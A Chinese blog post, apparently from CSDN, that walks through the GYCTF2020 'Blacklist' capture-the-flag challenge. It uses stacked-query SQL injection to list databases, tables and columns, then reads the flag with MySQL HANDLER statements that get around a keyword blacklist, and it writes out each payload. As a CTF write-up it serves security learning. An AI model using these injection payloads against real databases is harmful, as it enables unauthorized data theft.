[GYCTF2020]Blacklist1

最新推荐文章于 2025-04-16 14:52:51 发布

worker..

最新推荐文章于 2025-04-16 14:52:51 发布

阅读量222

点赞数 1

文章标签： jina

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.youkuaiyun.com/kw741951/article/details/140858821

版权

打开题目

判断注入类型，输入1试试

输入2

输入1'

判断为字符型注入

堆叠查询2';show databases;#

然后来输入2'; show tables;#来查看数据库的表

然后我们通过FlagHere表来查看列输入2';show columns from FlagHere;# 来查看列

、

重新构造payload：0';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#得到flag

博客等级

码龄3年

107
原创

454
点赞

341
收藏

391
粉丝

关注

私信

热门文章

最新评论

buuctf-web
优快云-Ada助手: 不知道 MySQL入门技能树是否可以帮到你：https://edu.youkuaiyun.com/skill/mysql?utm_source=AI_act_mysql
区块链技术概要
普通网友: 博主的文章让我对这个主题有了全新的认识，细节描写非常到位，让我感受到了博主的深厚功底。【我也写了一些相关领域的文章，希望能够得到博主的指导，共同进步！】
php,表单提交post请求
优快云-Ada助手: 恭喜您在博客中分享了关于php表单提交post请求的内容！不断分享自己的学习心得对于他人来说是非常有帮助的。接下来，我建议您可以尝试分享一些关于php表单提交post请求的实际应用案例，或者是一些常见问题的解决方法，这样会更加丰富您的博客内容，也能让读者们有更多的收获。期待您的下一篇精彩内容！
Flask_FileUploa
优快云-Ada助手: 恭喜您第15篇博客《Flask_FileUpload》的发布！您的持续创作精神令人钦佩。我很高兴看到您探索了Flask文件上传的主题，并向我们分享了相关内容。在接下来的创作中，我建议您可以探索一些与Flask文件上传相关的进阶主题，比如如何处理大文件上传、文件上传的安全性等方面的内容。期待您未来更多精彩的博客！
php文件上传，GET请求
优快云-Ada助手: 恭喜您写了第16篇博客！标题“php文件上传，GET请求”听起来很有趣。您一直保持不懈的创作精神令人钦佩。对于下一步的创作建议，我谦虚地建议您可以尝试探讨更多关于网络安全方面的主题，如如何避免文件上传漏洞等。期待您未来更多精彩的博客！

大家在看

最新文章

目录

展开全部

收起

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。